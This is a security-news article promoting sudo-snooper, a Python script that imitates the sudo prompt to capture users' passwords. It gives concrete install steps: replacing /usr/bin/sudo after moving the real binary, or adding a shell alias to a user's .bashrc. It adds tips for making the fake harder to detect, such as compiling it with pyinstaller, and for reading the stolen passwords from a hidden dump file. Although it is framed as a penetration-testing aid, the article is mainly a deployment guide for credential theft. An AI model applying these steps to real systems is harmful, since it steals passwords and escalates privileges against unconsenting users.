Home How To sudo-snooper – Python script to fool sudo users
How ToTips And Tricks

sudo-snooper – Python script to fool sudo users

by Unallocated Author
written by Unallocated Author

sudo-snooper acts like the original sudo binary to fool users into entering their passwords.
It will show a fake prompt just like the original to the user to enter their sudo password.
This can be useful in penetration tests or security evaluations for testing user knowledge.

Installation steps

Option 1 – Install in place of the real sudo (harder but less obvious)
You need root access for this install option
Step 1: Move the original sudo binary to another name

# mv /usr/bin/sudo /usr/bin/somename

Step 2: Change the parameters in the file to your liking

Change these in sudo-snooper.py:

dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'

Step 3: Install the python file in /usr/bin/sudo (or wherever sudo was before)

# install -dm755 sudo-snooper.py /usr/bin/sudo

Step 4: Give the necessary permissions to the python file
You can go fancy here and make a non-readable executable file for users, but I’m not going into that. Check some of the answers here for that.
NOTE : A somewhat more convincing way to install this is to compile it using pyinstaller so that it doesn’t show up as a python file when file /usr/bin/sudo is executed.
To do that under Archlinux: pyinstaller –onefile sudo-snooper.py will work. However please note that once compiled you won’t be able to change the parameters in the compiled binary.

Option 2 – Alias the sudo command (easier but somewhat more noticable)
This option is easier to do and more portable, however it might be more noticable to careful users.
Edit the .rc file of the shell the user is using (can be .bashrc .zshrc and so on) and add the following:

alias sudo='python3.5 /path/to/sudo-snooper.py'

Make sure sudo-snooper.py has the correct permissions.

Usage:

Once installed, sudo-snooper can be called just like the normal sudo.
For example, running

sudo vim /etc/resolv.conf

will result in sudo-snooper being called (assuming it’s properly installed).
It will ask for the user password and then execute the command by redirecting to the real sudo binary if the password is correct.
You can then retrieve the user password by reading the dump file in the settings.

Download now: sudo-snooper

Note: Handle when user enters wrong password.
Don’t ask for a password when the user has an active sudo session instead of this, now removes the cached credentials

Source: GitHub

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

You may also like

WordPress PWA – how to protect your Progressive...

The Future of Automated Testing with DAQ

Concerned About Your Online Privacy in 2024? You...

Safeguarding ERP Systems in the Digital Age: The...

How Artificial Intelligence Technology Affects Fintech Companies &...

Mitigating the Impact of Data Breaches Through DDR

“Let’s Get the Third Party Started In Here,”

Exploring HelpWire: A New Option in Free Remote...

Understanding Cybersecurity Basics for Businesses

Evolving Trends in Cloud Data Protection for 2024